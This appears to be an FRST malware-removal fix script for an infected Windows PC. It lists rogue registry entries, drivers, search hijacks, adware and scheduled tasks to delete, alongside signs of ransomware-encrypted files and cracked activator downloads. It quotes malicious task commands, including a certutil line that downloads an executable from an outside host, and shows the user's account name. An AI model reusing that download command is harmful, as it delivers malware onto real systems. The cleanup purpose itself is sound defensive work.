start::
CreateRestorePoint:
CloseProcesses:
Hosts:
RemoveProxy:
HKLM-x32\...\Run: [AVGUI.exe] => "C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\rempl\16UFQA0RNFS0NTRXEMIYY9660UG6\+RKgUAHAjp.exe [356864 2019-01-20]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [nrisk3] => rundll32.exe "C:\Users\hewou\AppData\Local\nrisk3.dll",nrisk3
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [WildFog] => C:\Windows\rss\csrss.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Run: [CloudNet] => C:\Users\hewou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\Winlogon: [Shell] "C:\Users\hewou\AppData\Roaming\D0WSaNhPfx4kukh2\Zqljw8Nc3Bzb.exe",explorer.exe
ShortcutTarget: fuguesfugues.lnk -> C:\Program Files (x86)\mattocks\Falzon.exe (Pas de fichier)
GroupPolicy: Restriction - Windows Defender
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://mysearch.avg.com/search?rvt=
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.com/#/?show_is=1&source=art
HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.com/#/?show_is=1&source=art
SearchScopes: HKLM-x32 -> DefaultScope {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&pid=
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=
SearchScopes: HKLM-x32 -> {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&pid=bcu&mid=
SearchScopes: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001 -> {E014A1F1-A814-4CEB-9927-0081210BB812} URL = hxxps://mysearch.avg.com/search?rvt=
SearchScopes: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=
OPR Extension: (Pas de nom) - C:\Users\hewou\AppData\Roaming\Opera Software\Opera Stable\Extensions\khkpnkbpjpiaccpnhgijmnlngncjlpdc
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22]
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
R2 YmZmMjdmMzBmNzRk; C:\WINDOWS\rrzyvrwrxlguvz.rrz [1213952 2019-01-20]
R1 75EAE980F475; C:\WINDOWS\75EAE980F475.sys [621928 2019-01-20]
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-21] () [Fichier non signé]
S3 FBDCCGTGWK; \??\C:\Users\hewou\AppData\Local\Temp\FBDCCGTGWK.sys [X] <==== ATTENTION
R1 Zjk3YjhmZjk5OTgyYzQz; \??\C:\WINDOWS\system32\drivers\Zjk3YjhmZjk5OTgyYzQz [X]
2019-01-21 17:12 - 2019-01-21 17:14 - 000000000 ___HD C:\Users\hewou\AppData\Roaming\D0WSaNhPfx4kukh2
2019-01-21 17:12 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\AppData\Roaming\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:13 - 000002534 _____ C:\Program Files (x86)\hr4ag4rifey.cfg.qgvioqx
2019-01-21 17:12 - 2019-01-21 17:12 - 000003026 _____ C:\Windows\System32\Tasks\PKsTXxbmnjfTBZZutgC2
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Users\hewou\AppData\Local\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-01-21 17:12 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\bLMoOsEEbuuGC
2019-01-21 17:11 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\AppData\Roaming\loweregcleaner
2019-01-21 17:11 - 2019-01-21 17:12 - 000000000 ____D C:\Program Files (x86)\vgjjPxjnrdvSplcncAR
2019-01-21 17:11 - 2019-01-21 17:11 - 000003212 _____ C:\Windows\System32\Tasks\GfMAIZTzcVSvml
2019-01-21 17:11 - 2019-01-21 17:11 - 000003044 _____ C:\Windows\System32\Tasks\LFgOsdPPciToq2
2019-01-21 17:11 - 2019-01-21 17:11 - 000003034 _____ C:\Windows\System32\Tasks\uivBKWbDPzuGcGhdY2
2019-01-21 17:11 - 2019-01-21 17:11 - 000003008 _____ C:\Windows\System32\Tasks\NVQvXnIpQfoDOKq2
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\ProgramData\Lavasoft
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\ProgramData\eJBlAwaaSdTwMIVB
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\WsxLtZnpU
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\OKuaQUguzkJU2
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\FVCturtSQrUn
2019-01-21 17:11 - 2019-01-21 17:11 - 000000000 ____D C:\Program Files (x86)\eWuDAKEgxIE
2019-01-20 14:24 - 2019-01-21 17:12 - 000000000 ___HD C:\$AV_AVG
2019-01-20 14:22 - 2019-01-21 17:08 - 000000000 ____D C:\Users\hewou\AppData\Local\AVG
2019-01-20 14:21 - 2019-01-20 14:21 - 000000000 ____D C:\Windows\System32\Tasks\AVG
2019-01-20 14:21 - 2019-01-20 14:21 - 000000000 ____D C:\Program Files\Common Files\AVG
2019-01-20 14:19 - 2019-01-21 17:08 - 000000000 ____D C:\ProgramData\AVG
2019-01-20 14:19 - 2019-01-20 14:19 - 007523992 _____ (AVG Technologies CZ, s.r.o.) C:\Users\hewou\Downloads\avg_antivirus_free_setup.exe
2019-01-20 14:15 - 2019-01-20 14:15 - 000221312 ____R (AVAST Software) C:\Users\hewou\Downloads\avast_free_antivirus_setup_online.exe
2019-01-20 13:57 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\Downloads\KMSAutoNet
2019-01-20 13:56 - 2019-01-21 17:14 - 004395102 _____ C:\Users\hewou\Downloads\KMSAutoNet.zip.qgvioqx
2019-01-20 13:54 - 2019-01-20 13:58 - 125360832 _____ C:\Users\hewou\Downloads\avira_antivirus_fr-fr.exe
2019-01-20 12:28 - 2019-01-20 12:28 - 000621928 ____N (VideoDriver) C:\Windows\75EAE980F475.sys
2019-01-20 12:28 - 2019-01-20 12:28 - 000000012 _____ C:\Windows\b37887854
2019-01-20 12:21 - 2019-01-21 17:14 - 000000000 ____D C:\Users\hewou\Downloads\KMSPico 10.2.1 [DazTeam.NG]
2019-01-20 12:21 - 2019-01-20 13:03 - 004845352 _____ C:\Users\hewou\Downloads\KMSPico 10.2.1 [DazTeam.NG].zip.qgvioqx
2019-01-20 08:21 - 2019-01-20 13:03 - 031957619 _____ C:\Users\hewou\Downloads\CHR_Cuda426_71.zip.qgvioqx
2019-01-19 14:55 - 2019-01-19 14:55 - 001938944 _____ C:\Windows\YzFiMGE2ZTA5NTA3N.exe
2019-01-19 14:55 - 2019-01-19 14:55 - 000140008 _____ C:\Windows\system32\Drivers\Zjk3YjhmZjk5OTgyYzQz
2019-01-10 17:50 - 2019-01-21 17:01 - 000003042 _____ C:\Windows\System32\Tasks\Avast Emergency Update
C:\Program Files\rempl\16UFQA0RNFS0NTRXEMIYY9660UG6\+RKgUAHAjp.exe
C:\Windows\rss\csrss.exe
C:\Users\hewou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll
ContextMenuHandlers1: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => -> Pas de fichier
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll
ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll
Task: {0CE865A8-1BD5-4D02-8048-033FF9FF9FA2} - System32\Tasks\GfMAIZTzcVSvml => rundll32 "C:\Program Files (x86)\OKuaQUguzkJU2\HMeahMehqvZRA.dll",#1
Task: {565499FD-ABD4-4F6A-B625-FAF133AAEAB9} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe
Task: {600D157A-0BE2-4C13-8926-99C5D84D67D7} - System32\Tasks\LFgOsdPPciToq2 => C:\Windows\system32\wscript.exe "C:\ProgramData\eJBlAwaaSdTwMIVB\dygjXkd.wsf
Task: {65D24355-8BB0-4470-A86B-1FBEF02E9AF0} - System32\Tasks\uivBKWbDPzuGcGhdY2 => rundll32 "C:\Program Files (x86)\vgjjPxjnrdvSplcncAR\tNFEiXN.dll",#1
Task: {866CDFA9-9E6B-48CE-83AC-4323D5A0A18D} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe
Task: {989BB14F-EF62-4225-8C3D-339206911A44} - System32\Tasks\NVQvXnIpQfoDOKq2 => rundll32 "C:\Program Files (x86)\WsxLtZnpU\MaMhvR.dll",#1
Task: {9B1BFAB3-8347-4867-95A7-F177388AD32F} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe
Task: {B7C67212-99AE-4192-ADD3-8FC8037AADC7} - System32\Tasks\PKsTXxbmnjfTBZZutgC2 => rundll32 "C:\Program Files (x86)\bLMoOsEEbuuGC\lrmyKOi.dll",#1
Task: {CFDA0743-E2A2-4AED-8DBF-B90A85B40B07} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
Task: {DCA20AA0-BFD0-4069-B5B7-8B9DB5823AD7} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
Task: {FD7F8C51-F13C-46DB-A77D-EA7F5E2D2181} - System32\Tasks\SVC Update => C:\WINDOWS\explorer.exe "hxxp://lktoday.ru"
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe
2019-01-21 17:12 - 2019-01-21 17:12 - 000025888 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
2019-01-21 17:12 - 2019-01-21 17:12 - 000017696 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.Service.Logger.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000037664 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WcfService.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000120608 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AppCore.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000105248 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000373536 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000059168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000067360 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Events.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000084256 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SysInfo.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000057632 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.CSharp.Utilities.dll
2019-01-21 17:12 - 2019-01-21 17:12 - 000020768 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Compression.dll
IE trusted site: HKU\S-1-5-21-4047767408-1034429467-1529396284-1001\...\webcompanion.com -> hxxp://webcompanion.com
EmptyTemp:
cmd: ipconfig /flushdns
end::